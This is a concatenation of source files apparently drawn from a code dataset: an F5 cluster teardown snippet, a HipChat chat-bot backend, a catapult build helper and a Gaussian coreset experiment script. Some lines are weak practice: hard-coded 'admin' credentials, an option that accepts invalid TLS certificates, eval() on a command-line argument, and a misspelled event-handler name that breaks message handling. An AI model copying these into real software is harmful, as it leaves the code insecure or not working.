from f5.cluster.cluster_manager import ClusterManager
a = ManagementRoot('10.190.20.202', 'admin', 'admin')
b = ManagementRoot('10.190.20.203', 'admin', 'admin')
c = ManagementRoot('10.190.20.204', 'admin', 'admin')
cm = ClusterManager([a, b], 'testing_cluster', 'Common', 'sync-failover')
cm.teardown_cluster()
|
will/backends/io_adapters/hipchat.py
|
Ashex/will
| 349 |
115910
|
from datetime import datetime
import json
import logging
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
import random
import re
import requests
import pickle
import sys
import time
import threading
import traceback
from sleekxmpp import ClientXMPP
from sleekxmpp.exceptions import IqError, IqTimeout
from .base import IOBackend
from will import settings
from will.utils import is_admin
from will.acl import is_acl_allowed
from will.abstractions import Event, Message, Person, Channel
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import StorageMixin, PubSubMixin
ROOM_NOTIFICATION_URL = "https://%(server)s/v2/room/%(room_id)s/notification?auth_token=%(token)s"
ROOM_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
ROOM_URL = "https://%(server)s/v2/room/%(room_id)s/?auth_token=%(token)s"
SET_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
PRIVATE_MESSAGE_URL = "https://%(server)s/v2/user/%(user_id)s/message?auth_token=%(token)s"
USER_DETAILS_URL = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s"
ALL_USERS_URL = ("https://%(server)s/v2/user?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s")
ALL_ROOMS_URL = ("https://%(server)s/v2/room?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s&expand=items")
# From RoomsMixins
V1_TOKEN_URL = "https://%(server)s/v1/rooms/list?auth_token=%(token)s"
V2_TOKEN_URL = "https://%(server)s/v2/room?auth_token=%(token)s&expand=items"
class HipChatRosterMixin(object):
@property
def people(self):
if not hasattr(self, "_people"):
self._people = self.load('will_hipchat_people', {})
return self._people
@property
def internal_roster(self):
        logging.warning(
"mixin.internal_roster has been deprecated. Please use mixin.people instead. "
"internal_roster will be removed at the end of 2017"
)
return self.people
def get_user_by_full_name(self, name):
for jid, info in self.people.items():
if info["name"] == name:
return info
return None
def get_user_by_nick(self, nick):
for jid, info in self.people.items():
if info["nick"] == nick:
return info
return None
def get_user_by_jid(self, jid):
if jid in self.people:
return self.people[jid]
return None
def get_user_from_message(self, message):
if message["type"] == "groupchat":
if "xmpp_jid" in message:
user = self.get_user_by_jid(message["xmpp_jid"])
if user:
return user
elif "from" in message:
full_name = message["from"].split("/")[1]
user = self.get_user_by_full_name(full_name)
if user:
return user
if "mucnick" in message:
return self.get_user_by_full_name(message["mucnick"])
elif message['type'] in ('chat', 'normal'):
jid = ("%s" % message["from"]).split("@")[0].split("_")[1]
return self.get_user_by_jid(jid)
else:
return None
def message_is_from_admin(self, message):
nick = self.get_user_from_message(message)['nick']
return is_admin(nick)
def message_is_allowed(self, message, acl):
nick = self.get_user_from_message(message)['nick']
return is_acl_allowed(nick, acl)
def get_user_by_hipchat_id(self, id):
for jid, info in self.people.items():
if info["hipchat_id"] == id:
return info
return None
class HipChatRoom(Bunch):
@property
def id(self):
if 'room_id' in self:
# Using API v1
return self['room_id']
elif 'id' in self:
# Using API v2
return self['id']
else:
raise TypeError('Room ID not found')
@property
def history(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get("https://{1}/v2/room/{0}/history".format(str(self.id),
settings.HIPCHAT_SERVER),
params=payload, **settings.REQUESTS_OPTIONS)
data = json.loads(response.text)['items']
for item in data:
item['date'] = datetime.strptime(item['date'][:-13], "%Y-%m-%dT%H:%M:%S")
return data
@property
def participants(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get(
"https://{1}/v2/room/{0}/participant".format(
str(self.id),
settings.HIPCHAT_SERVER
),
params=payload,
**settings.REQUESTS_OPTIONS
).json()
data = response['items']
while 'next' in response['links']:
response = requests.get(response['links']['next'],
params=payload, **settings.REQUESTS_OPTIONS).json()
data.extend(response['items'])
return data
class HipChatRoomMixin(object):
def update_available_rooms(self, q=None):
self._available_rooms = {}
# Use v1 token to grab a full room list if we can (good to avoid rate limiting)
if hasattr(settings, "V1_TOKEN"):
url = V1_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V1_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if r.status_code == requests.codes.unauthorized:
raise Exception("V1_TOKEN authentication failed with HipChat")
for room in r.json()["rooms"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id.
room["id"] = room["room_id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
# Otherwise, grab 'em one-by-one via the v2 api.
else:
params = {}
params['start-index'] = 0
max_results = params['max-results'] = 1000
url = V2_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN}
while True:
resp = requests.get(url, params=params,
**settings.REQUESTS_OPTIONS)
if resp.status_code == requests.codes.unauthorized:
raise Exception("V2_TOKEN authentication failed with HipChat")
rooms = resp.json()
for room in rooms["items"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id
room["room_id"] = room["id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
logging.info('Got %d rooms', len(rooms['items']))
if len(rooms['items']) == max_results:
params['start-index'] += max_results
else:
break
self.save("hipchat_rooms", self._available_rooms)
if q:
q.put(self._available_rooms)
@property
def available_rooms(self):
if not hasattr(self, "_available_rooms"):
self._available_rooms = self.load('hipchat_rooms', None)
if not self._available_rooms:
self.update_available_rooms()
return self._available_rooms
def get_room_by_jid(self, jid):
for room in self.available_rooms.values():
if "xmpp_jid" in room and room["xmpp_jid"] == jid:
return room
return None
def get_room_from_message(self, message):
return self.get_room_from_name_or_id(message.data.channel.name)
def get_room_from_name_or_id(self, name_or_id):
for name, room in self.available_rooms.items():
if name_or_id.lower() == name.lower():
return room
if "xmpp_jid" in room and name_or_id == room["xmpp_jid"]:
return room
if "room_id" in room and name_or_id == room["room_id"]:
return room
return None
class HipChatXMPPClient(ClientXMPP, HipChatRosterMixin, HipChatRoomMixin, StorageMixin, PubSubMixin):
def start_xmpp_client(self, xmpp_bridge_queue=None, backend_name=""):
logger = logging.getLogger(__name__)
if not xmpp_bridge_queue:
logger.error("Missing required bridge queue")
self.xmpp_bridge_queue = xmpp_bridge_queue
self.backend_name = backend_name
ClientXMPP.__init__(self, "%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
if settings.USE_PROXY:
self.use_proxy = True
self.proxy_config = {
'host': settings.PROXY_HOSTNAME,
'port': settings.PROXY_PORT,
'username': settings.PROXY_USERNAME,
'password': settings.PROXY_PASSWORD,
}
self.rooms = []
self.default_room = settings.HIPCHAT_DEFAULT_ROOM
my_user_url = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s" % {
"user_id": settings.HIPCHAT_USERNAME.split("@")[0].split("_")[1],
"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
}
r = requests.get(my_user_url, **settings.REQUESTS_OPTIONS)
resp = r.json()
if "email" in resp:
settings.HIPCHAT_EMAIL = resp["email"]
settings.HIPCHAT_HANDLE = resp["mention_name"]
settings.HIPCHAT_NAME = resp["name"]
else:
raise EnvironmentError(
"\n\nError getting user info from Hipchat. This is usually a problem with the\n"
"username or V2 token, but here's what I heard back from them: \n\n %s\n\n" % resp
)
self.available_rooms
if hasattr(settings, "HIPCHAT_ROOMS") and settings.HIPCHAT_ROOMS:
for r in settings.HIPCHAT_ROOMS:
if r != "":
if not hasattr(self, "default_room"):
self.default_room = r
try:
self.rooms.append(self.available_rooms[r])
except KeyError:
logger.error(
u'"{0}" is not an available room, ask'
' "@{1} what are the rooms?" for the full list.'
.format(r, settings.HIPCHAT_HANDLE))
else:
for name, r in self.available_rooms.items():
if not hasattr(self, "default_room"):
self.default_room = r
self.rooms.append(r)
self.nick = settings.HIPCHAT_HANDLE
self.handle = settings.HIPCHAT_HANDLE
self.mention_handle = "@%s" % settings.HIPCHAT_HANDLE
self.whitespace_keepalive = True
self.whitespace_keepalive_interval = 30
if settings.ALLOW_INSECURE_HIPCHAT_SERVER is True:
self.add_event_handler('ssl_invalid_cert', lambda cert: True)
self.add_event_handler("roster_update", self.join_rooms)
self.add_event_handler("session_start", self.session_start)
self.add_event_handler("message", self.message_recieved)
self.add_event_handler("groupchat_message", self.room_message)
self.add_event_handler("groupchat_invite", self.room_invite)
self.add_event_handler("error", self.handle_errors)
self.add_event_handler("presence_error", self.handle_errors)
self.register_plugin('xep_0045') # MUC
def session_start(self, event):
self.send_presence()
try:
self.get_roster()
except IqError as err:
logging.error('There was an error getting the roster')
logging.error(err.iq['error']['condition'])
self.disconnect()
except IqTimeout:
logging.error('Server is taking too long to respond. Disconnecting.')
self.disconnect()
def join_rooms(self, event):
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def handle_errors(self, event):
print("got error event")
print(event)
def room_invite(self, event):
logging.info("Invite recieved for %s" % event)
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def update_will_roster_and_rooms(self):
people = self.load('will_hipchat_people', {})
# Loop through the connected rooms (self.roster comes from ClientXMPP)
for roster_id in self.roster:
cur_roster = self.roster[roster_id]
# Loop through the users in a given room
for user_id in cur_roster:
user_data = cur_roster[user_id]
if user_data["name"] != "":
# If we don't have this user in the people, add them.
                    if user_id not in people:
people[user_id] = Person()
hipchat_id = user_id.split("@")[0].split("_")[1]
# Update their info
people[user_id].update({
"name": user_data["name"],
"jid": user_id,
"hipchat_id": hipchat_id,
})
# If we don't have a nick yet, pull it and mention_name off the master user list.
                    if not hasattr(people[user_id], "nick") and hipchat_id in self.people:
                        user_data = self.people[hipchat_id]
people[user_id].nick = user_data["mention_name"]
people[user_id].mention_name = user_data["mention_name"]
# If it's me, save that info!
if people[user_id].get("name", "") == self.nick:
self.me = people[user_id]
self.save("will_hipchat_people", people)
self.update_available_rooms()
def room_message(self, msg):
self._send_to_backend(msg)
    def message_received(self, msg):
if msg['type'] in ('chat', 'normal'):
self._send_to_backend(msg)
def real_sender_jid(self, msg):
# There's a bug in sleekXMPP where it doesn't set the "from_jid" properly.
# Thus, this hideous hack.
msg_str = "%s" % msg
start = 'from_jid="'
start_pos = msg_str.find(start)
if start_pos != -1:
cut_start = start_pos + len(start)
return msg_str[cut_start:msg_str.find('"', cut_start)]
return msg["from"]
def _send_to_backend(self, msg):
stripped_msg = Bunch()
# TODO: Find a faster way to do this - this is crazy.
for k, v in msg.__dict__.items():
try:
pickle.dumps(v)
stripped_msg[k] = v
except:
pass
for k in msg.xml.keys():
try:
# print(k)
# print(msg.xml.get(k))
pickle.dumps(msg.xml.get(k))
stripped_msg[k] = msg.xml.get(k)
except:
# print("failed to parse %s" % k)
pass
stripped_msg.xmpp_jid = msg.getMucroom()
stripped_msg.body = msg["body"]
self.xmpp_bridge_queue.put(stripped_msg)
class HipChatBackend(IOBackend, HipChatRosterMixin, HipChatRoomMixin, StorageMixin):
friendly_name = "HipChat"
internal_name = "will.backends.io_adapters.hipchat"
required_settings = [
{
"name": "HIPCHAT_USERNAME",
"obtain_at": """1. Go to hipchat, and create a new user for will.
2. Log into will, and go to Account settings>XMPP/Jabber Info.
3. On that page, the 'Jabber ID' is the value you want to use.""",
},
{
"name": "HIPCHAT_PASSWORD",
"obtain_at": (
"1. Go to hipchat, and create a new user for will. "
"Note that password - this is the value you want. "
"It's used for signing in via XMPP."
),
},
{
"name": "HIPCHAT_V2_TOKEN",
"obtain_at": """1. Log into hipchat using will's user.
2. Go to https://your-org.hipchat.com/account/api
3. Create a token.
4. Copy the value - this is the HIPCHAT_V2_TOKEN.""",
}
]
def send_direct_message(self, user_id, message_body, html=False, card=None, notify=False, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_direct_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/private_message_user
url = PRIVATE_MESSAGE_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_direct_message: \n%s" % traceback.format_exc())
def send_room_message(self, room_id, message_body, html=False, color="green", notify=False, card=None, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_room_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_NOTIFICATION_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"color": color,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_room_message: \n%s" % traceback.format_exc())
def set_room_topic(self, room_id, topic):
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_TOPIC_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"topic": topic,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.put(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
except:
logging.critical("Error in set_room_topic: \n%s" % traceback.format_exc())
def get_room_from_message(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
return False
else:
# We're in a public room
return send_source.channel.id
else:
# Came from webhook/etc
if "room" in kwargs:
return kwargs["room"],
else:
return self.get_room_from_name_or_id(settings.HIPCHAT_DEFAULT_ROOM)["room_id"]
return False
def get_hipchat_user(self, user_id, q=None):
url = USER_DETAILS_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if q:
q.put(r.json())
else:
return r.json()
@property
def people(self):
if not hasattr(self, "_people"):
full_roster = {}
# Grab the first roster page, and populate full_roster
url = ALL_USERS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
self._people = full_roster
for k, u in full_roster.items():
if u.handle == settings.HIPCHAT_HANDLE:
self.me = u
return self._people
@property
def channels(self):
if not hasattr(self, "_channels"):
all_rooms = {}
# Grab the first roster page, and populate all_rooms
url = ALL_ROOMS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
# print(room)
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={},
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={}
)
self._channels = all_rooms
return self._channels
def normalize_incoming_event(self, event):
logging.debug("hipchat: normalize_incoming_event - %s" % event)
if event["type"] in ("chat", "normal", "groupchat") and ("from_jid" in event or "from" in event):
sender = self.get_user_from_message(event)
interpolated_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
            channel = None
            is_private_chat = False
if "xmpp_jid" in event and event["xmpp_jid"]:
channel = clean_for_pickling(self.channels[event["xmpp_jid"]])
is_private_chat = False
else:
if event["type"] in ("chat", "normal"):
is_private_chat = True
is_direct = False
if is_private_chat or event["body"].startswith(interpolated_handle):
is_direct = True
if event["body"].startswith(interpolated_handle):
event["body"] = event["body"][len(interpolated_handle):].strip()
if interpolated_handle in event["body"]:
will_is_mentioned = True
if sender and self.me and sender.id == self.me.id:
will_said_it = True
m = Message(
content=event["body"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
# print("normalized:")
# print(m.__dict__)
return m
else:
# print("Unknown event type")
# print(event)
return None
def handle_outgoing_event(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
room = None
passed_room = None
if "room" in kwargs:
passed_room = kwargs["room"]
if "channel" in kwargs:
passed_room = kwargs["channel"]
if passed_room:
if isinstance(passed_room, str):
# User passed in a room string
room = self.get_room_from_name_or_id(passed_room)
else:
# User found the internal HipChatRoom object and passed it.
room = passed_room
else:
# Default to the room we heard this message in.
room = self.get_room_from_message(event)
room_id = None
if room and hasattr(room, "id"):
room_id = room.id
else:
room_id = room
if event.type in ["say", "reply"]:
event.content = re.sub(r'>\s+<', '><', event.content)
if hasattr(event, "source_message") and event.source_message and not room:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
self.send_direct_message(send_source.sender.id, event.content, **kwargs)
return
# Otherwise trust room.
self.send_room_message(
room_id,
event.content,
**kwargs
)
elif event.type in ["topic_change", ]:
if room_id:
self.set_room_topic(room_id, event.content)
else:
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
self.send_direct_message(send_source.sender.id, "I can't set the topic of a one-to-one chat. Let's just talk.", **kwargs)
elif (
event.type == "message.no_response"
and event.data.is_direct
and event.data.will_said_it is False
):
if event.data.original_incoming_event.type == "groupchat":
self.send_room_message(
event.data.channel.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
else:
self.send_direct_message(
event.data.sender.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
def __handle_bridge_queue(self):
while True:
try:
try:
input_event = self.xmpp_bridge_queue.get(timeout=settings.EVENT_LOOP_INTERVAL)
if input_event:
self.handle_incoming_event(input_event)
except Empty:
pass
except (KeyboardInterrupt, SystemExit):
pass
self.sleep_for_event_loop()
def bootstrap(self):
        # Bootstrap must provide a way to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
self.client = HipChatXMPPClient("%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
self.xmpp_bridge_queue = Queue()
self.client.start_xmpp_client(
xmpp_bridge_queue=self.xmpp_bridge_queue,
backend_name=self.internal_name,
)
self.client.connect()
# Even though these are properties, they do some gets and self-fillings.
self.people
self.channels
self.bridge_thread = Process(target=self.__handle_bridge_queue)
self.bridge_thread.start()
self.xmpp_thread = Process(target=self.client.process, kwargs={"block": True})
self.xmpp_thread.start()
def terminate(self):
if hasattr(self, "xmpp_thread"):
self.xmpp_thread.terminate()
if hasattr(self, "bridge_thread"):
self.bridge_thread.terminate()
while (
(hasattr(self, "xmpp_thread") and self.xmpp_thread.is_alive())
or (hasattr(self, "bridge_thread") and self.bridge_thread.is_alive())
):
time.sleep(0.2)
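# Rough usage sketch (illustrative assumption only; will normally instantiates
# and bootstraps its IO backends itself based on settings, so this is not how
# the backend is typically started by hand):
#
#   backend = HipChatBackend()
#   backend.bootstrap()
#   backend.send_room_message(room_id=123, message_body="hello", notify=True)
#   backend.terminate()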
|
tracing/tracing_build/vulcanize_histograms_viewer.py
|
tingshao/catapult
| 2,151 |
115926
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import tracing_project
from py_vulcanize import generate
from tracing_build import render_histograms_viewer
def VulcanizeHistogramsViewer():
"""Vulcanizes Histograms viewer with its dependencies.
Args:
path: destination to write the vulcanized viewer HTML.
"""
vulcanizer = tracing_project.TracingProject().CreateVulcanizer()
load_sequence = vulcanizer.CalcLoadSequenceForModuleNames(
['tracing_build.histograms_viewer'])
return generate.GenerateStandaloneHTMLAsString(load_sequence)
def VulcanizeAndRenderHistogramsViewer(
histogram_dicts, output_stream, reset_results=False):
render_histograms_viewer.RenderHistogramsViewer(
histogram_dicts, output_stream, reset_results,
VulcanizeHistogramsViewer())
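# Illustrative usage (an assumption, not part of this module): write the
# vulcanized viewer for an empty list of histograms to a local file.
#
#   with open('histograms.html', 'w') as f:
#     VulcanizeAndRenderHistogramsViewer([], f)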
|
examples/gaussian/main.py
|
trevorcampbell/hilbert-coresets
| 118 |
115944
|
import numpy as np
import scipy.linalg as sl
import pickle as pk
import os, sys
import argparse
import time
#make it so we can import models/etc from parent folder
import bayesiancoresets as bc
sys.path.insert(1, os.path.join(sys.path[0], '../common'))
import model_gaussian as gaussian
import results
import plotting
def plot(arguments):
# load only the results that match (avoid high mem usage)
to_match = vars(arguments)
#remove any ignored params
if arguments.summarize is not None:
for nm in arguments.summarize:
to_match.pop(nm, None)
#remove any legend param
to_match.pop(arguments.plot_legend, None)
#load cols from results dfs that match remaining keys
resdf = results.load_matching(to_match)
#call the generic plot function
plotting.plot(arguments, resdf)
def run(arguments):
# check if result already exists for this run, and if so, quit
if results.check_exists(arguments):
print('Results already exist for arguments ' + str(arguments))
print('Quitting.')
quit()
#######################################
#######################################
## Step 0: Setup
#######################################
#######################################
np.random.seed(arguments.trial)
bc.util.set_verbosity(arguments.verbosity)
if arguments.coreset_size_spacing == 'log':
Ms = np.unique(np.logspace(0., np.log10(arguments.coreset_size_max), arguments.coreset_num_sizes, dtype=np.int32))
else:
Ms = np.unique(np.linspace(1, arguments.coreset_size_max, arguments.coreset_num_sizes, dtype=np.int32))
#make sure the first size to record is 0
if Ms[0] != 0:
Ms = np.hstack((0, Ms))
#######################################
#######################################
## Step 1: Generate a Synthetic Dataset
#######################################
#######################################
#change these to change the prior / likelihood
mu0 = np.zeros(arguments.data_dim)
Sig0 = np.eye(arguments.data_dim)
Sig = np.eye(arguments.data_dim)
#these are computed
Sig0inv = np.linalg.inv(Sig0)
Siginv = np.linalg.inv(Sig)
LSigInv = np.linalg.cholesky(Siginv) #Siginv = LL^T, L Lower tri
USig = sl.solve_triangular(LSigInv, np.eye(LSigInv.shape[0]), lower=True, overwrite_b=True, check_finite=False).T # Sig = UU^T, U upper tri
th = np.ones(arguments.data_dim)
logdetSig = np.linalg.slogdet(Sig)[1]
#######################################
#######################################
## Step 2: Calculate Likelihoods/Projectors
#######################################
#######################################
print('Computing true posterior')
x = np.random.multivariate_normal(th, Sig, arguments.data_num)
mup, USigp, LSigpInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, x, np.ones(x.shape[0]))
Sigp = USigp.dot(USigp.T)
SigpInv = LSigpInv.dot(LSigpInv.T)
#create the log_likelihood function
print('Creating log-likelihood function')
log_likelihood = lambda x, th : gaussian.log_likelihood(x, th, Siginv, logdetSig)
print('Creating gradient log-likelihood function')
grad_log_likelihood = lambda x, th : gaussian.gradx_log_likelihood(x, th, Siginv)
print('Creating tuned projector for Hilbert coreset construction')
#create the sampler for the "optimally-tuned" Hilbert coreset
sampler_optimal = lambda n, w, pts : mup + np.random.randn(n, mup.shape[0]).dot(USigp.T)
prj_optimal = bc.BlackBoxProjector(sampler_optimal, arguments.proj_dim, log_likelihood, grad_log_likelihood)
print('Creating untuned projector for Hilbert coreset construction')
#create the sampler for the "realistically-tuned" Hilbert coreset
xhat = x[np.random.randint(0, x.shape[0], int(np.sqrt(x.shape[0]))), :]
muhat, USigHat, LSigHatInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, xhat, np.ones(xhat.shape[0]))
sampler_realistic = lambda n, w, pts : muhat + np.random.randn(n, muhat.shape[0]).dot(USigHat.T)
prj_realistic = bc.BlackBoxProjector(sampler_realistic, arguments.proj_dim, log_likelihood, grad_log_likelihood)
print('Creating black box projector')
def sampler_w(n, wts, pts):
if wts is None or pts is None or pts.shape[0] == 0:
wts = np.zeros(1)
pts = np.zeros((1, mu0.shape[0]))
muw, USigw, _ = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)
return muw + np.random.randn(n, muw.shape[0]).dot(USigw.T)
prj_bb = bc.BlackBoxProjector(sampler_w, arguments.proj_dim, log_likelihood, grad_log_likelihood)
print('Creating exact projectors')
#TODO need to fix all the transposes in this...
class GaussianProjector(bc.Projector):
def project(self, pts, grad=False):
nu = (pts - self.muw).dot(LSigInv)
PsiL = LSigInv.T.dot(self.USigw)
Psi = PsiL.dot(PsiL.T)
nu = np.hstack((nu.dot(PsiL), np.sqrt(0.5*np.trace(np.dot(Psi.T, Psi)))*np.ones(nu.shape[0])[:,np.newaxis]))
nu *= np.sqrt(nu.shape[1])
if not grad:
return nu
else:
                gnu = np.hstack((LSigInv.dot(PsiL), np.zeros(pts.shape[1])[:,np.newaxis])).T
gnu = np.tile(gnu, (pts.shape[0], 1, 1))
gnu *= np.sqrt(gnu.shape[1])
return nu, gnu
def update(self, wts = None, pts = None):
if wts is None or pts is None or pts.shape[0] == 0:
wts = np.zeros(1)
pts = np.zeros((1, mu0.shape[0]))
self.muw, self.USigw, self.LSigwInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)
prj_optimal_exact = GaussianProjector()
prj_optimal_exact.update(np.ones(x.shape[0]), x)
prj_realistic_exact = GaussianProjector()
prj_realistic_exact.update(np.ones(xhat.shape[0]), xhat)
#######################################
#######################################
## Step 3: Construct Coreset
#######################################
#######################################
##############################
print('Creating coreset construction objects')
#create coreset construction objects
sparsevi_exact = bc.SparseVICoreset(x, GaussianProjector(), opt_itrs = arguments.opt_itrs, step_sched = eval(arguments.step_sched))
sparsevi = bc.SparseVICoreset(x, prj_bb, opt_itrs = arguments.opt_itrs, step_sched = eval(arguments.step_sched))
giga_optimal = bc.HilbertCoreset(x, prj_optimal)
giga_optimal_exact = bc.HilbertCoreset(x,prj_optimal_exact)
giga_realistic = bc.HilbertCoreset(x,prj_realistic)
giga_realistic_exact = bc.HilbertCoreset(x,prj_realistic_exact)
unif = bc.UniformSamplingCoreset(x)
algs = {'SVI-EXACT': sparsevi_exact,
'SVI': sparsevi,
'GIGA-OPT': giga_optimal,
'GIGA-OPT-EXACT': giga_optimal_exact,
'GIGA-REAL': giga_realistic,
'GIGA-REAL-EXACT': giga_realistic_exact,
'US': unif}
alg = algs[arguments.alg]
print('Building coreset')
w = []
p = []
cputs = np.zeros(Ms.shape[0])
t_build = 0
for m in range(Ms.shape[0]):
print('M = ' + str(Ms[m]) + ': coreset construction, '+ arguments.alg + ' ' + str(arguments.trial))
t0 = time.process_time()
itrs = (Ms[m] if m == 0 else Ms[m] - Ms[m-1])
alg.build(itrs)
t_build += time.process_time()-t0
wts, pts, idcs = alg.get()
#store weights/pts/runtime
w.append(wts)
p.append(pts)
cputs[m] = t_build
##############################
##############################
## Step 4: Evaluate coreset
##############################
##############################
# computing kld and saving results
muw = np.zeros((Ms.shape[0], mu0.shape[0]))
Sigw = np.zeros((Ms.shape[0], mu0.shape[0], mu0.shape[0]))
rklw = np.zeros(Ms.shape[0])
fklw = np.zeros(Ms.shape[0])
csizes = np.zeros(Ms.shape[0])
mu_errs = np.zeros(Ms.shape[0])
Sig_errs = np.zeros(Ms.shape[0])
for m in range(Ms.shape[0]):
csizes[m] = (w[m] > 0).sum()
muw[m, :], USigw, LSigwInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, p[m], w[m])
Sigw[m, :, :] = USigw.dot(USigw.T)
rklw[m] = gaussian.KL(muw[m,:], Sigw[m,:,:], mup, SigpInv)
fklw[m] = gaussian.KL(mup, Sigp, muw[m,:], LSigwInv.dot(LSigwInv.T))
mu_errs[m] = np.sqrt(((mup - muw[m,:])**2).sum()) / np.sqrt((mup**2).sum())
Sig_errs[m] = np.sqrt(((Sigp - Sigw[m,:,:])**2).sum()) / np.sqrt((Sigp**2).sum())
results.save(arguments, csizes = csizes, Ms = Ms, cputs = cputs, rklw = rklw, fklw = fklw, mu_errs = mu_errs, Sig_errs = Sig_errs)
